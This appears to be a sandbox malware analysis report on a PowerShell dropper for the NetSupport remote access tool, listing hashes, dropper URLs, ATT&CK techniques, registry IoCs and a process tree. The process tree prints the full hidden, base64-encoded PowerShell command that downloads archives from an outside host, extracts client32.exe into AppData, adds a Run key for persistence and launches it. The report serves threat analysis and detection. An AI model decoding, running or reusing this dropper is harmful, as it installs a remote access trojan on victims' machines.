netsupport | ff7d125fd5fb64e819326a56bbf2058421bcf664afa4a35a9776e4b349b2ab02

Analysis

max time kernel
47s
max time network
52s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
10-07-2024 07:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ps.ps1
Size

7KB
MD5

fa984c53dea49067c5b0521f9c0150ff
SHA1

2b533282e80095f92743c726f31a9677e4ac4bb7
SHA256

ff7d125fd5fb64e819326a56bbf2058421bcf664afa4a35a9776e4b349b2ab02
SHA512

89df117ff9776d243c89c74b0a3012ce139562b492838b8f140a271dcdb989b63b631cca6bff19a2c2db97e6fbfcff09258233b2693f97f6367db0c111ccbae5
SSDEEP

192:TWrxPZI7Wu8wjOSlVExkdw/+jMLKXyP22klPbbwXNX:MZI/8wj/wG4eXyPVk2XNX

Score

10^/10

netsupport execution persistence rat

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://cpnfun.com/akz/ak1.zip

exe.dropper

https://cpnfun.com/akz/ak3.zip

exe.dropper

https://cpnfun.com/akz/ak4.zip

exe.dropper

https://cpnfun.com/akz/ak2.zip

exe.dropper

https://cpnfun.com/fls/

Signatures

NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
rat netsupport

Executes dropped EXE 1 IoCs

pid	Process
2020	client32.exe

Loads dropped DLL 6 IoCs

pid	Process
2020	client32.exe
2020	client32.exe
2020	client32.exe
2020	client32.exe
2020	client32.exe
2020	client32.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinRebootStateSave = "C:\\Users\\Admin\\AppData\\Roaming\\WinRebootStateSave\\client32.exe"	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4092	powershell.exe

Checks processor information in registry 2 TTPs 8 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings	firefox.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
4092	powershell.exe
4092	powershell.exe
4092	powershell.exe
1620	powershell.exe
1620	powershell.exe
1620	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	4092	powershell.exe
Token: SeDebugPrivilege	1620	powershell.exe
Token: SeSecurityPrivilege	2020	client32.exe
Token: SeDebugPrivilege	3052	firefox.exe
Token: SeDebugPrivilege	3052	firefox.exe

Suspicious use of FindShellTrayWindow 5 IoCs

pid	Process
2020	client32.exe
3052	firefox.exe
3052	firefox.exe
3052	firefox.exe
3052	firefox.exe

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
3052	firefox.exe
3052	firefox.exe
3052	firefox.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3052	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4092 wrote to memory of 1620	4092	powershell.exe	74
PID 4092 wrote to memory of 1620	4092	powershell.exe	74
PID 1620 wrote to memory of 2020	1620	powershell.exe	76
PID 1620 wrote to memory of 2020	1620	powershell.exe	76
PID 1620 wrote to memory of 2020	1620	powershell.exe	76
PID 4728 wrote to memory of 3052	4728	firefox.exe	82
PID 4728 wrote to memory of 3052	4728	firefox.exe	82
PID 4728 wrote to memory of 3052	4728	firefox.exe	82
PID 4728 wrote to memory of 3052	4728	firefox.exe	82
PID 4728 wrote to memory of 3052	4728	firefox.exe	82
PID 4728 wrote to memory of 3052	4728	firefox.exe	82
PID 4728 wrote to memory of 3052	4728	firefox.exe	82
PID 4728 wrote to memory of 3052	4728	firefox.exe	82
PID 4728 wrote to memory of 3052	4728	firefox.exe	82
PID 4728 wrote to memory of 3052	4728	firefox.exe	82
PID 4728 wrote to memory of 3052	4728	firefox.exe	82
PID 3052 wrote to memory of 4464	3052	firefox.exe	83
PID 3052 wrote to memory of 4464	3052	firefox.exe	83
PID 3052 wrote to memory of 5060	3052	firefox.exe	84
PID 3052 wrote to memory of 5060	3052	firefox.exe	84
PID 3052 wrote to memory of 5060	3052	firefox.exe	84
PID 3052 wrote to memory of 5060	3052	firefox.exe	84
PID 3052 wrote to memory of 5060	3052	firefox.exe	84
PID 3052 wrote to memory of 5060	3052	firefox.exe	84
PID 3052 wrote to memory of 5060	3052	firefox.exe	84
PID 3052 wrote to memory of 5060	3052	firefox.exe	84
PID 3052 wrote to memory of 5060	3052	firefox.exe	84
PID 3052 wrote to memory of 5060	3052	firefox.exe	84
PID 3052 wrote to memory of 5060	3052	firefox.exe	84
PID 3052 wrote to memory of 5060	3052	firefox.exe	84
PID 3052 wrote to memory of 5060	3052	firefox.exe	84
PID 3052 wrote to memory of 5060	3052	firefox.exe	84
PID 3052 wrote to memory of 5060	3052	firefox.exe	84
PID 3052 wrote to memory of 5060	3052	firefox.exe	84
PID 3052 wrote to memory of 5060	3052	firefox.exe	84
PID 3052 wrote to memory of 5060	3052	firefox.exe	84
PID 3052 wrote to memory of 5060	3052	firefox.exe	84
PID 3052 wrote to memory of 5060	3052	firefox.exe	84
PID 3052 wrote to memory of 5060	3052	firefox.exe	84
PID 3052 wrote to memory of 5060	3052	firefox.exe	84
PID 3052 wrote to memory of 5060	3052	firefox.exe	84
PID 3052 wrote to memory of 5060	3052	firefox.exe	84
PID 3052 wrote to memory of 5060	3052	firefox.exe	84
PID 3052 wrote to memory of 5060	3052	firefox.exe	84
PID 3052 wrote to memory of 5060	3052	firefox.exe	84
PID 3052 wrote to memory of 5060	3052	firefox.exe	84
PID 3052 wrote to memory of 5060	3052	firefox.exe	84
PID 3052 wrote to memory of 5060	3052	firefox.exe	84
PID 3052 wrote to memory of 5060	3052	firefox.exe	84
PID 3052 wrote to memory of 5060	3052	firefox.exe	84
PID 3052 wrote to memory of 5060	3052	firefox.exe	84
PID 3052 wrote to memory of 5060	3052	firefox.exe	84
PID 3052 wrote to memory of 5060	3052	firefox.exe	84
PID 3052 wrote to memory of 5060	3052	firefox.exe	84
PID 3052 wrote to memory of 5060	3052	firefox.exe	84
PID 3052 wrote to memory of 5060	3052	firefox.exe	84
PID 3052 wrote to memory of 5060	3052	firefox.exe	84
PID 3052 wrote to memory of 5060	3052	firefox.exe	84
PID 3052 wrote to memory of 5060	3052	firefox.exe	84
PID 3052 wrote to memory of 5060	3052	firefox.exe	84
PID 3052 wrote to memory of 5060	3052	firefox.exe	84
PID 3052 wrote to memory of 5060	3052	firefox.exe	84
PID 3052 wrote to memory of 5060	3052	firefox.exe	84
PID 3052 wrote to memory of 5060	3052	firefox.exe	84

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\ps.ps1
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4092
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NOpR -ExECU byPASS -win hiDd -ENCodEDC JAB5ADkASQBGAFEAPQAnAEIATwA3ADkANQB1AGUALgB6AGkAcAAnADsAIAAkAEIAUABWAE8AQwBaAD0AJwBoAHQAdABwAHMAOgAvAC8AYwBwAG4AZgB1AG4ALgBjAG8AbQAvAGEAawB6AC8AYQBrADEALgB6AGkAcAAnADsAIAAkAG4AZQA1AFEAawA9ACcASQBlAG4AZgBhAFYAMQBwAC4AegBpAHAAJwA7ACAAJABhAFQAeQByAEUAOQA9ACcAaQAxAHEAVgBOAC4AegBpAHAAJwA7ACAAJABwAGIAZQBRAE8AcAA9ACcAaAB0AHQAcABzADoALwAvAGMAcABuAGYAdQBuAC4AYwBvAG0ALwBhAGsAegAvAGEAawAzAC4AegBpAHAAJwA7ACAAJABKAG0AawAzADUAbABXAD0AJwBXAGkAbgBSAGUAYgBvAG8AdABTAHQAYQB0AGUAUwBhAHYAZQAnADsAIABDAGQAIAAkAGUAbgBWADoAQQBwAHAARABBAFQAYQA7ACAAJAB1AEYAbwBJAFUAdgA0AFkAPQBHAGUAVAAtAGMAbwBNAG0AYQBOAEQAIABlAFgAcABhAG4AZAAtAEEAcgBDAEgAaQB2AGUAIAAtAEUAcgByAE8AUgBhAEMAdABJAE8AbgAgAHMAaQBMAGUATgBUAEwAeQBDAG8ATgB0AEkAbgBVAEUAOwAgACQAWQBwAEEAZwBOAHAAPQAnAGgAdAB0AHAAcwA6AC8ALwBjAHAAbgBmAHUAbgAuAGMAbwBtAC8AYQBrAHoALwBhAGsANAAuAHoAaQBwACcAOwAgACQAeABWAHcATwBOAD0AJwBoAHQAdABwAHMAOgAvAC8AYwBwAG4AZgB1AG4ALgBjAG8AbQAvAGEAawB6AC8AYQBrADIALgB6AGkAcAAnADsAIABbAG4AZQB0AC4AUwBFAFIAdgBpAEMARQBQAG8ASQBuAHQATQBhAE4AQQBHAEUAUgBdADoAOgBzAGUAQwBVAFIASQBUAHkAUAByAE8AVABvAGMAbwBMACAAPQAgAFsAbgBFAFQALgBTAEUAYwB1AHIASQB0AHkAUABSAG8AdABvAEMAbwBsAFQAeQBQAEUAXQA6ADoAdABMAFMAMQAyADsAIAAkADQATQBqAEIAWQBjAHoAPQAnAGgAeQBQAHEANgBMAC4AegBpAHAAJwA7ACAAJABFAFQAVQBrAHgAPQBHAGUAVAAtAGMAbwBNAG0AYQBOAEQAIABTAFQAQQBSAHQALQBCAGkAVABzAHQAcgBhAE4AUwBmAGUAcgAgAC0AZQByAFIAbwByAGEAQwBUAGkAbwBuACAAUwBJAGwAZQBOAFQATAB5AEMATwBOAFQAaQBOAFUAZQA7ACAAJABSAHgAbgBYAGMAaQA9ACQAZQBOAFYAOgBBAHAAcABEAEEAVABhACsAJwBcACcAKwAkAGEAVAB5AHIARQA5ADsAIAAkAGIAdwBXAGUANgA9ACIAewAwAH0AXAB7ADEAfQAiACAALQBmACAAJABlAE4AVgA6AEEAUABwAEQAYQBUAGEALAAgACQAbgBlADUAUQBrADsAIAAkAEgARABJADMAVQBrAHUAPQAiACQAZQBOAHYAOgBhAFAAUABkAEEAdABBAFwAJAA0AE0AagBCAFkAYwB6ACIAOwAgACQAcwBwAE4AcAA4AFcAPQAkAGUATgBWADoAQQBwAHAARABBAFQAYQAsACAAJAB5ADkASQBGAFEAIAAtAEoAbwBJAE4AIAAnAFwAJwA7ACAAJABUAGUAcQBvAEkARQBSAGsAPQAkAEUAbgB2ADoAQQBwAFAARABBAHQAQQArACcAXAAnACsAJABKAG0AawAzADUAbABXADsAIAAkAFcAdQBNAGwAMgBxADMATQA9ACIAYgBJAHQAUwBBAEQAbQBpAE4ALgBFAFgARQAgAC8AdABSAEEAbgBzAEYAZQBSACAARwA3AG8ARwA4AEsAYgAgAC8AZABPAHcAbgBsAE8AYQBEACAALwBwAHIAaQBvAHIAaQB0AFkAIABuAG8AUgBNAGEAbAAgAHsAMAB9ACAAewAxAH0AIgAgAC0AZgAgACQAQgBQAFYATwBDAFoALAAgACQAUgB4AG4AWABjAGkAOwAgACQAYgBVAEgANQBQAEsAPQAiAGIASQBUAFMAYQBkAE0AaQBOAC4AZQBYAEUAIAAvAFQAUgBhAE4AcwBGAGUAcgAgAE8AUgB5AE8ATwAgAC8AZABPAFcATgBMAE8AYQBkACAALwBwAHIAaQBPAFIASQB0AHkAIABOAG8AUgBtAGEAbAAgACQAeABWAHcATwBOACAAJABiAHcAVwBlADYAIgA7ACAAJAAxADcATwBvAEgATQBlAHEAPQAnAGIASQB0AFMAQQBEAG0AaQBOAC4ARQBYAEUAIAAvAHQAUgBBAG4AcwBGAGUAUgAgAEcANwBvAEcAOABLAGIAIAAvAGQATwB3AG4AbABPAGEARAAgAC8AcAByAGkAbwByAGkAdABZACAAbgBvAFIATQBhAGwAJwAsACAAJABCAFAAVgBPAEMAWgAsACAAJABzAHAATgBwADgAVwAgAC0AagBvAGkAbgAgACcAIAAnADsAIAAkAFUANABPAEEAMgBYAG4APQAiAGIAaQB0AHMAQQBEAE0ASQBOAC4ARQB4AEUAIAAvAFQAUgBBAE4AUwBmAGUAUgAgADcAZwBSAFkAVgBiAHkASQAgAC8ARABvAFcAbgBMAG8AQQBEACAALwBQAHIASQBPAHIAaQBUAFkAIABOAE8AcgBNAEEAbAAgAHsAMAB9ACAAewAxAH0AIgAgAC0AZgAgACQAcABiAGUAUQBPAHAALAAgACQASABEAEkAMwBVAGsAdQA7ACAASQBGACAAKAAkAHUARgBvAEkAVQB2ADQAWQApACAAewAgAEkAZgAgACgAJABFAFQAVQBrAHgAKQAgAHsAIABTAFQAYQByAHQALQBiAGkAdABzAFQAcgBBAG4AcwBmAEUAcgAgAC0AUwBvAHUAUgBjAGUAIAAkAHAAYgBlAFEATwBwACAALQBEAGUAcwBUAGkATgBhAHQAaQBPAG4AIAAkAEgARABJADMAVQBrAHUAOwAgAHMAVABBAHIAdAAtAGIASQBUAFMAVAByAEEAbgBTAGYAZQByACAALQBTAE8AdQBSAGMARQAgACQAQgBQAFYATwBDAFoAIAAtAEQARQBzAFQAaQBOAGEAVABJAE8ATgAgACQAcwBwAE4AcAA4AFcAOwAgAFMAVABBAHIAVAAtAGIASQBUAFMAVAByAEEATgBzAGYAZQBSACAALQBTAE8AdQBSAEMARQAgACQAeABWAHcATwBOACAALQBEAEUAUwB0AEkAbgBBAFQASQBvAG4AIAAkAGIAdwBXAGUANgA7ACAAUwB0AGEAcgBUAC0AQgBJAHQAcwB0AHIAYQBuAFMARgBlAHIAIAAtAFMAbwB1AFIAYwBlACAAJABZAHAAQQBnAE4AcAAgAC0ARABlAFMAdABpAE4AQQBUAEkATwBuACAAJABSAHgAbgBYAGMAaQA7ACAAfQAgAGUAbABTAEUAIAB7AEkARQB4ACAALQBjAG8ATQBNAEEATgBkACAAJABVADQATwBBADIAWABuADsAIABpAG4AVgBPAEsARQAtAGUAeABQAHIARQBzAHMAaQBvAG4AIAAtAGMATwBNAG0AQQBOAGQAIAAkAFcAdQBNAGwAMgBxADMATQA7ACAAaQBuAFYATwBLAEUALQBlAHgAUAByAEUAcwBzAGkAbwBuACAALQBjAE8ATQBtAEEATgBkACAAJAAxADcATwBvAEgATQBlAHEAOwAgAGkATgB2AE8ASwBFAC0AZQBYAFAAcgBlAFMAUwBpAG8ATgAgAC0AQwBvAG0ATQBBAE4AZAAgACQAYgBVAEgANQBQAEsAOwAgAH0AIABFAHgAUABBAG4ARAAtAEEAUgBDAEgASQB2AGUAIAAtAHAAQQBUAGgAIAAkAHMAcABOAHAAOABXACAALQBEAGUAcwBUAEkATgBhAHQASQBvAG4AUABBAHQAaAAgACQAVABlAHEAbwBJAEUAUgBrADsAIABFAHgAcABBAE4AZAAtAGEAcgBDAEgAaQB2AGUAIAAtAHAAYQB0AGgAIAAkAGIAdwBXAGUANgAgAC0ARABFAFMAVABpAE4AQQBUAGkAbwBOAHAAYQBUAEgAIAAkAFQAZQBxAG8ASQBFAFIAawA7ACAAZQB4AHAAQQBOAGQALQBhAFIAQwBoAGkAVgBFACAALQBQAGEAdABIACAAJABSAHgAbgBYAGMAaQAgAC0AZABFAHMAdABpAE4AYQB0AGkAbwBOAHAAYQB0AGgAIAAkAFQAZQBxAG8ASQBFAFIAawA7ACAARQB4AHAAYQBOAGQALQBhAHIAYwBoAEkAVgBFACAALQBwAEEAdABIACAAJABIAEQASQAzAFUAawB1ACAALQBkAGUAcwB0AEkAbgBBAFQASQBvAE4AcABhAFQAaAAgACQAVABlAHEAbwBJAEUAUgBrADsAIAByAEQAIAAtAFAAYQBUAGgAIAAkAEgARABJADMAVQBrAHUAOwAgAHIAbQAgAC0AcABhAFQASAAgACQAYgB3AFcAZQA2ADsAIABFAHIAQQBzAGUAIAAtAFAAQQBUAGgAIAAkAFIAeABuAFgAYwBpADsAIABkAGUAbAAgAC0AUABhAHQAaAAgACQAcwBwAE4AcAA4AFcAOwAgAH0AIABlAGwAcwBFACAAewAgACQAVwBqAFYAeABwAD0AJwBoAHQAdABwAHMAOgAvAC8AYwBwAG4AZgB1AG4ALgBjAG8AbQAvAGYAbABzAC8AJwA7ACAAJABMAFcAcAB0ADUAPQBAACgAJwBQAEMASQBDAEwAMwAyAC4ARABMAEwAJwAsACAAJwBBAHUAZABpAG8AQwBhAHAAdAB1AHIAZQAuAGQAbABsACcALAAgACcAbgBzAG0AXwB2AHAAcgBvAC4AaQBuAGkAJwAsACAAJwBjAGwAaQBlAG4AdAAzADIALgBlAHgAZQAnACwAIAAnAGMAbABpAGUAbgB0ADMAMgAuAGkAbgBpACcALAAgACcAbgBzAGsAYgBmAGwAdAByAC4AaQBuAGYAJwAsACAAJwByAGUAbQBjAG0AZABzAHQAdQBiAC4AZQB4AGUAJwAsACAAJwBIAFQAQwBUAEwAMwAyAC4ARABMAEwAJwAsACAAJwBOAFMATQAuAEwASQBDACcALAAgACcAUABDAEkAQwBIAEUASwAuAEQATABMACcALAAgACcAVABDAEMAVABMADMAMgAuAEQATABMACcALAAgACcAcABjAGkAYwBhAHAAaQAuAGQAbABsACcALAAgACcAbQBzAHYAYwByADEAMAAwAC4AZABsAGwAJwApADsAIABuAEUAdwAtAEkAdABlAG0AIAAtAFAAQQBUAEgAIAAkAGUATgB2ADoAYQBwAHAARABBAHQAQQAgAC0ATgBBAG0AZQAgACQASgBtAGsAMwA1AGwAVwAgAC0AaQBUAGUATQB0AFkAUABlACAAJwBkAGkAcgBlAGMAdABvAHIAeQAnADsAIABJAEYAIAAoACQARQBUAFUAawB4ACkAIAB7ACAAJABMAFcAcAB0ADUAIAB8ACAARgBvAFIAZQBBAGMAaAAgAHsAIAAkAHYAUgA5AFAAQwA1AD0AJABXAGoAVgB4AHAAKwAkAF8AOwAgACQAUwBCADEAaQB3AGYAPQBqAG8AaQBOAC0AUABBAFQAaAAgAC0AUABBAFQAaAAgACQAVABlAHEAbwBJAEUAUgBrACAALQBjAGgAaQBMAGQAUABBAFQASAAgACQAXwA7ACAAcwB0AEEAUgBUAC0AQgBpAFQAUwB0AHIAYQBuAHMAZgBlAFIAIAAtAFMATwBVAHIAQwBlACAAJAB2AFIAOQBQAEMANQAgAC0ARABlAFMAdABpAE4AYQB0AEkATwBOACAAJABTAEIAMQBpAHcAZgA7ACAAfQA7AH0AIABFAEwAcwBFACAAewAgACQATABXAHAAdAA1ACAAfAAgACUAIAB7ACAAJAB2AFIAOQBQAEMANQA9ACQAVwBqAFYAeABwACsAJABfADsAIAAkAFMAQgAxAGkAdwBmAD0AIgAkAFQAZQBxAG8ASQBFAFIAawBcACQAXwAiADsAIAAkAEgAWgBaAGYANQBiAHcAeAA9ACIAYgBJAHQAcwBhAEQAbQBJAG4ALgBFAFgARQAgAC8AVABSAEEAbgBzAEYARQByACAAMgB4AE8AUgBhACAALwBEAE8AVwBuAGwATwBhAEQAIAAvAFAAUgBpAE8AcgBpAFQAeQAgAG4ATwByAE0AYQBMACAAJAB2AFIAOQBQAEMANQAgACQAUwBCADEAaQB3AGYAIgA7ACAAaQBFAHgAIAAtAEMAbwBNAE0AQQBuAEQAIAAkAEgAWgBaAGYANQBiAHcAeAA7AH0AOwAgAH0AOwAgAH0AOwAgACQAYgAwAFAARABhAEUAPQBnAEUAVAAtAGkAVABlAG0AIAAkAFQAZQBxAG8ASQBFAFIAawAgAC0ARgBPAFIAQwBFADsAIAAkAGIAMABQAEQAYQBFAC4AYQB0AFQAUgBJAEIAVQBUAEUAUwA9ACcASABpAGQAZABlAG4AJwA7ACAAQwBkACAAJABUAGUAcQBvAEkARQBSAGsAOwAgACQAcwBWAEwAaABYAHUAPQAkAFQAZQBxAG8ASQBFAFIAawArACcAXABjAGwAaQBlAG4AdAAzADIALgBlAHgAZQAnADsAIABOAGUAdwAtAGkAdABlAG0AcAByAG8AUABFAHIAVAB5ACAALQBQAGEAVABIACAAJwBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABSAHUAbgAnACAALQBOAEEAbQBlACAAJABKAG0AawAzADUAbABXACAALQBWAEEATAB1AEUAIAAkAHMAVgBMAGgAWAB1ACAALQBwAFIATwBwAGUAUgB0AFkAdAB5AHAARQAgACcAUwB0AHIAaQBuAGcAJwA7ACAAUwBUAEEAcgB0ACAAYwBsAGkAZQBuAHQAMwAyAC4AZQB4AGUAOwA=
  2⤵
  - Adds Run key to start application
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1620
- - C:\Users\Admin\AppData\Roaming\WinRebootStateSave\client32.exe
    "C:\Users\Admin\AppData\Roaming\WinRebootStateSave\client32.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    PID:2020

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1140

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4728
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Modifies registry class
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:3052
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3052.0.58933469\2002499854" -parentBuildID 20221007134813 -prefsHandle 1716 -prefMapHandle 1704 -prefsLen 20747 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1f0cbc61-4508-4835-8098-f322a228ade0} 3052 "\\.\pipe\gecko-crash-server-pipe.3052" 1812 152aa1f4b58 gpu
    3⤵
    PID:4464
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3052.1.823561508\771549248" -parentBuildID 20221007134813 -prefsHandle 2156 -prefMapHandle 2152 -prefsLen 20828 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b3cd94e0-6744-44ac-bec8-6d8481c39ce0} 3052 "\\.\pipe\gecko-crash-server-pipe.3052" 2168 1529f172858 socket
    3⤵
    - Checks processor information in registry
    PID:5060
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3052.2.818120664\29479721" -childID 1 -isForBrowser -prefsHandle 2812 -prefMapHandle 2744 -prefsLen 20931 -prefMapSize 233444 -jsInitHandle 1320 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0e13cfda-125e-41af-8ef6-711b4666a01e} 3052 "\\.\pipe\gecko-crash-server-pipe.3052" 2752 152aa15b958 tab
    3⤵
    PID:3684
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3052.3.1223337512\613806043" -childID 2 -isForBrowser -prefsHandle 3484 -prefMapHandle 3476 -prefsLen 26109 -prefMapSize 233444 -jsInitHandle 1320 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {20dbfe4d-0e77-4581-b74e-333a374980dc} 3052 "\\.\pipe\gecko-crash-server-pipe.3052" 3496 1529f161658 tab
    3⤵
    PID:3240
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3052.4.314952038\1561644934" -childID 3 -isForBrowser -prefsHandle 3788 -prefMapHandle 3784 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1320 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e6d7006c-1381-4ec1-bf4a-483fbe63a147} 3052 "\\.\pipe\gecko-crash-server-pipe.3052" 3800 152af9c0558 tab
    3⤵
    PID:4904
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3052.5.1470525632\742879662" -childID 4 -isForBrowser -prefsHandle 4888 -prefMapHandle 4884 -prefsLen 26249 -prefMapSize 233444 -jsInitHandle 1320 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {77e4c1aa-40ab-4e13-9786-73b7a63f9d7e} 3052 "\\.\pipe\gecko-crash-server-pipe.3052" 4896 152ae9e1e58 tab
    3⤵
    PID:2908
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3052.6.712588979\551960468" -childID 5 -isForBrowser -prefsHandle 4896 -prefMapHandle 5028 -prefsLen 26249 -prefMapSize 233444 -jsInitHandle 1320 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ebc57dbf-bd2b-4d76-90c0-61508e89cd24} 3052 "\\.\pipe\gecko-crash-server-pipe.3052" 5056 152b08aae58 tab
    3⤵
    PID:2884
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3052.7.1928772442\1960413390" -childID 6 -isForBrowser -prefsHandle 5192 -prefMapHandle 5196 -prefsLen 26249 -prefMapSize 233444 -jsInitHandle 1320 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {622a9d9b-dea0-48c5-97bf-377686dd1a5c} 3052 "\\.\pipe\gecko-crash-server-pipe.3052" 5184 152b0a4ab58 tab
    3⤵
    PID:520

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
d30605e1f10cd7cb156c87b1969478b3

SHA1
2e33bcfb9c509797005a2ebc9f67ae2e89cbe5c2

SHA256
73862b3cec368996f0aa4dd5028933ce5770c2e54ab805d2d6f454400da805be

SHA512
3e484864b8be35efc8dab8d48adb80082850aa4324505e2da23136bb42f6e60b13d9d1798ee8417580b251b1e0267055654e1ed5232bfd2d9d41bb0035180174

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
faf8a76f3b9b0c62bd7493fd44a6a7a7

SHA1
6b1ebcd127fdd5bcff285985d9f526b0fe9cb3fe

SHA256
551c4e04dafb855479391f53b4f5654ede08d9daa373789db30a119f4304c04a

SHA512
99c194d491dd0ff9a29f37a08f955311fc23dcd196096aec56cde31c5d1f3a57e2a4563ed017ad0467618016d1fa1cbada10bbc490ec6438582b9a35dff83069

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1ygospje.hqc.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
